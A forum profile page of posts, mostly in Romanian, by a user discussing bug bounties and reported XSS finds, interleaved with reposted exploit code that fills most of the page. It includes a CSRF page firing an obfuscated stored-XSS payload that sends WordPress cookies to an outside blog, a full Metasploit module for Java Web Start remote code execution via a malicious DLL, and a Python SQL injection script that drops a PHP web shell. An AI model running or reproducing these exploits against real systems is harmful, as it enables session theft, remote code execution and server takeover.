-
Posts
1203 -
Joined
-
Last visited
-
Days Won
61
Everything posted by akkiliON
-
Am sa fac un video mai bine si cand e reparat am sa il postez Multumesc !
-
# Exploit: Paypal.com - XSS (Cross Site Scripting) PERSISTENT # Author: akkiliON # Works on: IE, Firefox, Chrome, Opera, Safari # Target: Paypal # PoC: http://img826.imageshack.us/img826/5403/p8st.jpg L-am gasit de cateva zile ! Astept un raspuns de la ei ! Cand il repara am sa postez imaginea necenzurata !
-
Se pare c? e reparat ! Era în Sea Advertising Yahoo Recompens? :
-
Pana la urma ai gasit ceva ! Bravo !
-
******* T.I.N.K.O.D.E(Cum cauta faima) Hackerville part 1
akkiliON replied to 7jok3er5646's topic in Cosul de gunoi
-
########################################################################################### # Exploit Title: [ Wordpress WP-SendSMS v1.0 Plugin CSRF and Stored XSS Vulnerabilities] # # Date: [2013-6-9] # # Exploit Author: [expl0i13r] # # Vendor Homepage: [http://wordpress.org/plugins/wp-sendsms/] # # Software Link: [http://downloads.wordpress.org/plugin/wp-sendsms.1.1.zip] # # Version: [1.0] # # Tested on: [Wordpress 3.5.1 (Windows)] # # Contact: expl0i13r@gmail.com # ########################################################################################### Summary: ======== 1. Plugin Description 2. CSRF to Trigger Stored XSS 3. Stored XSS Details 1. Plugin Description: ======================== WP-SendSMS is WordPress Plugin for allowing user to send SMS using SMS Gateway. This Plugin allows site owner to add SMS Gateway in Plugin Setting Page. 2. CSRF to Trigger Stored XSS : =============================== Vulnerability Description: --------------------------- This wordpress plugin "WP-SendSMS 1.0" suffers from CSRF vulnerability which can be successfully exploited to trigger Stored XSS vulnerability which in turn sends Wordpress logged in user's cookie to attacker's website. Attacker can also exploit this CSRF vulnerability to change SMS Settings. Affected URL: -------------- http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms eXpl0it code: -------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name="myForm" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms" method="post"> <textarea name="wpsms_api1" id="wpsms_api1" class="regular-text" cols="100" rows="5">http://blackpentesters.blogspot.com/smsapi.php?username=yourusername&password=yourpassword&mobile=[Mobile]&sms=[TextMessage]&senderid=[SenderID]</textarea> <input type="text" name="sender_id" id="sender_id" value="eXpl0i13r"> <input type="checkbox" name="remove_bad_words" id="remove_bad_words" checked="checked" value="1"> # Below Field Contains XSS Payload for sending Cookies to attacker website : # In my case this will redirect you to http://blackpentesters.blogspot.com+cookies <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>"> <input type="checkbox" name="captcha" id="captcha" checked="checked" value="1"> <input type="text" name="captcha_width" class="captcha_option_input" value="" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="4" id="acpro_inp6"> <input type="checkbox" name="confirm_page" id="confirm_page" checked="checked" value="1"> <input type="checkbox" name="allow_without_login" id="allow_without_login" checked="checked" value="1"> <input type="checkbox" name="custom_response" id="custom_response" value="1"> <textarea name="custom_response_text" cols="100" rows="5"></textarea> <input type="hidden" name="settings_submit" value="true"> <input type="submit" value="Update Settings" class="button-primary"> </form> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> Stored XSS Details : ===================== URL: ===== http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms Stored XSS Vulnerable Parameters: ================================== 1. sender_id 2. maximum_characters 3. captcha_width 4. captcha_height 4. captcha_characters HTML Code : ------------- <input type="text" name="sender_id" id="sender_id" value=""> <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""> <input type="text" name="captcha_width" class="captcha_option_input" value="1" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="1" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="" id="acpro_inp6"> XSS Payload Used: ------------------ "><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script> Each of above parameters can be exploited by attacker through CSRF vulnerability for stealing Cookies.
-
## # # ======================================================== # Java Web Start Double Quote Inject Remote Code Execution # ======================================================== # # Date: Jun 12 2012 (updated: Jun 6 2013) # Author: Rh0 # Version: At least Java 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 # Tested on: Windows XP SP3 EN and Windows 7 # CVE: 2012-1533 # # advisory: http://pastebin.com/eUucVage # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Sun Java Web Start Double Quote Injection', 'Description' => %q{ This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server. }, 'Author' => [ # NOTE: module is completely based on and almost the same like jducks module for CVE-2012-0500 (Rev: 4369f73c) 'Rh0 <rh0 () z1p dot biz>', # discovery and msf module ], 'Version' => '0.0', 'References' => [ [ 'URL', 'http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/java_ws_vmargs.rb' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], ], 'Platform' => 'win', 'Payload' => { 'Space' => 1024, 'BadChars' => '', 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" }, 'Targets' => [ [ 'Automatic', { } ], [ 'Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with a SMB server)' ]) ], self.class) end def auto_target(cli, request) agent = request.headers['User-Agent'] ret = nil #print_status("Agent: #{agent}") # Check for MSIE and/or WebDAV redirector requests if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/ ret = targets[1] elsif agent =~ /MSIE (6|7|8)\.0/ ret = targets[1] else print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end ret end def on_request_uri(cli, request) # For this exploit, this does little besides ensures the user agent is a recognized one.. mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) if (not mytarget) send_not_found(cli) return end end # Special case to process OPTIONS for / if (request.method == 'OPTIONS' and request.uri == '/') process_options(cli, request, mytarget) return end # Discard requests for ico files if (request.uri =~ /\.ico$/i) send_not_found(cli) return end # If there is no subdirectory in the request, we need to redirect. if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//) if (request.uri == '/') subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' else subdir = request.uri + '/' end print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...") send_redirect(cli, subdir) return else share_name = $1 end # dispatch WebDAV requests based on method first case request.method when 'OPTIONS' process_options(cli, request, mytarget) when 'PROPFIND' process_propfind(cli, request, mytarget) when 'GET' process_get(cli, request, mytarget, share_name) when 'PUT' print_status("Sending 404 for PUT #{request.uri} ...") send_not_found(cli) else print_error("Unexpected request method encountered: #{request.method}") end end # # GET requests # def process_get(cli, request, target, share_name) print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") # dispatch based on extension if (request.uri =~ /\.dll$/i) # # DLL requests sent by IE and the WebDav Mini-Redirector # print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...") # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Generate a DLL based on the payload dll_data = generate_payload_dll({ :code => p.encoded }) # Send it send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' }) elsif (request.uri =~ /\.jnlp$/i) # # Send the jnlp document # # Prepare the UNC path... if (datastore['UNCPATH']) unc = datastore['UNCPATH'].dup else my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] unc = "\\\\" + my_host + "\\" + share_name end # NOTE: we ensure there's only a single backslash here since it will get escaped if unc[0,2] == "\\\\" unc.slice!(0, 1) end http_agent = Rex::Text.rand_text_alpha(8+rand(8)) # use initial-heap-size='"' to inject a double quote and max-heap-size=" -XXaltjvm=\\IP\share " to # inject a parameter into the command line of javaw.exe # codebase, href and application-desc parameters successfully suppress java splash jnlp_data = <<-EOS <?xml version="1.0" encoding="UTF-8"?> <jnlp version="1" codebase="#{Rex::Text.rand_text_alpha(rand(10)+10)}" href="#{Rex::Text.rand_text_alpha(rand(10)+10)}.jnlp"> <information> <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title> <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor> <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description> </information> <resources> <java version="1.6+" initial-heap-size='"' max-heap-size=" -XXaltjvm=#{unc} " /> </resources> <application-desc progress-class="#{Rex::Text.rand_text_alpha(rand(10)+10)}" /> </jnlp> EOS print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' }) else print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}") jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8)) jnlp_path = get_resource() if jnlp_path[-1,1] != '/' jnlp_path << '/' end jnlp_path << request.uri.split('/')[-1] << '/' jnlp_path << jnlp_name << ".jnlp" send_redirect(cli, jnlp_path, '') end end # # OPTIONS requests sent by the WebDav Mini-Redirector # def process_options(cli, request, target) print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") headers = { #'DASL' => '<DAV:sql>', #'DAV' => '1, 2', 'Allow' => 'OPTIONS, GET, PROPFIND', 'Public' => 'OPTIONS, GET, PROPFIND' } send_response(cli, '', headers) end # # PROPFIND requests sent by the WebDav Mini-Redirector # def process_propfind(cli, request, target) path = request.uri print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}") body = '' if (path =~ /\.dll$/i) # Response for the DLL print_status("Sending DLL multistatus for #{path} ...") #<lp1:getcontentlength>45056</lp1:getcontentlength> body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype/> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag> <lp2:executable>F</lp2:executable> <D:lockdiscovery/> <D:getcontenttype>application/octet-stream</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | elsif (path =~ /\/$/) or (not path.sub('/', '').index('/')) # Response for anything else (generally just /) print_status("Sending directory multistatus for #{path} ...") body = %Q|<?xml version="1.0" encoding="utf-8"?> <D:multistatus xmlns:D="DAV:"> <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/"> <D:href>#{path}</D:href> <D:propstat> <D:prop> <lp1:resourcetype><D:collection/></lp1:resourcetype> <lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> <lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> <lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag> <D:lockdiscovery/> <D:getcontenttype>httpd/unix-directory</D:getcontenttype> </D:prop> <D:status>HTTP/1.1 200 OK</D:status> </D:propstat> </D:response> </D:multistatus> | else print_status("Sending 404 for #{path} ...") send_not_found(cli) return end # send the response resp = create_response(207, "Multi-Status") resp.body = body resp['Content-Type'] = 'text/xml' cli.send_response(resp) end # # Make sure we're on the right port/path to support WebDAV # def exploit if !datastore['UNCPATH'] && (datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/') raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' end super end end
-
?tiu c? nu se poate fura cookie ! L-am raportat ! Am scris Yahoo ca ?int? doar + am scris ?i pagina lor principal? care este ! Dac? m? în?elegi
-
~ Exploit: *.Yahoo.net - XSS (Cross Site Scripting) Reflected ~ Author: akkiliON ~ Date: 05/09/2013 ~ Target: Yahoo ~ PoC:
-
De ce l-ai postat la Bug Bounty ? Din cate stiu nu primesti nimic de la ei ON: Bravo // PRODUCTS AND SERVICES (NO REWARD) http://bugcrowd.com/list-of-bug-bounty-programs/ Aici se incadreaza !
-
Nu primesti nimic pentru XSS-uri ! Citeste bine ! The avast! bug bounty program Poate o sa primesti o licenta ! In rest sa nu te astepti la bani
-
Nu te lauzi ca l-ai gasit tu ? ) Ca cel din Paypal !
-
XSS Persistent ?
-
Nu cred ca mai prindem loc ! )
-
Lasa ca ii cheltui eu ! Am tot timpul din viata ) Eu sunt multumit sa primesc si 1 milion )
-
Jesus Christ ... 84-year-old
-
Daca nu ma insel incearca 0000,1234 sau 12345 ... Am avut nokia c3-00 si din cate stiu una din astea 3 e codul de securitate ! Cred ca 12345 din ce vad eu aici e codul de securitate default ! http://discussions.nokia.com/t5/Hardware-Codes-and-Operator/Forgot-my-Nokia-c3-00-security-code/td-p/1478352 Bafta ! // EDIT: Asta in caz daca nu ti-ai schimbat tu codul se securitate !
-
Daca sunt de treaba baietii nu cred ca nu ar primii ceva ! Eu nu am avut nici o legatura cu ei + nu am auzit in viata mea de acest site Am avut si eu o experienta foarte interesanta pot spune eu cu un site destul de marisor ! Pentru ca le-am raportat o vulnerabilitate am primit 1000 $ ca recompensa de la ei Nu stii la ce te poti astepta !
-
# Exploit Title: PHD Help Desk 2.12 SQLi # Date: 05/24/2013 # Exploit Author: drone (@dronesec) # More information: http://forelsec.blogspot.com/2013/06/phd-help-desk-212-sqli-and-xss.html # Vendor Homepage: http://www.p-hd.com.ar/ # Software Link: http://downloads.sourceforge.net/project/phd/phd_released/phd%202.12/phd_2_12.zip # Version: 2.12 # Tested on: Ubuntu 12.04 (apparmor disabled) """ This app is so full of SQLi & XSS; if you're looking for practice with real web apps, this is a good place to go. You don't need auth for this. """ from argparse import ArgumentParser import string import random import urllib, urllib2 import sys def run(options): print '[!] Dropping web shell on %s...'%(options.ip) shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5)) # <? php system($_GET["rr"]); ?> data = urllib.urlencode({'operador''\' UNION SELECT 0x3c3f7068702073797374656d28245f4745545b227272225d293b3f3e' ',null,null,null,null,null,null,null,null,null,null,null,null,null INTO OUTFILE' ' \'{0}/{1}.php'.format(options.path,shell)), 'contrasenia':'pass', 'submit':'Enter', 'captcha':''}) urllib2.urlopen('http://{0}{1}/login.php'.format(options.ip, options.rootp), data) print '[!] Shell dropped. http://%s%s/%s.php?rr=ls'%(options.ip,options.rootp,shell) def parse(): parser = ArgumentParser() parser.add_argument('-i',help='server address',action='store',dest='ip') parser.add_argument('-p',help='path to login.php (/phd_2_12)',action='store', default='/phd_2_12', dest='rootp') parser.add_argument('-w',help='writable web path (/var/www/phd_2_12) for shell', default='/var/www/phd_2_12/', action='store', dest='path') options = parser.parse_args() if not options.ip: parser.print_help() sys.exit(1) options.path = options.path if options.path[-1] != '/' else options.path[:-1] options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1] return options if __name__=="__main__": run(parse())
-
Iti respect decizia pe care ai luat-o ! Bravo !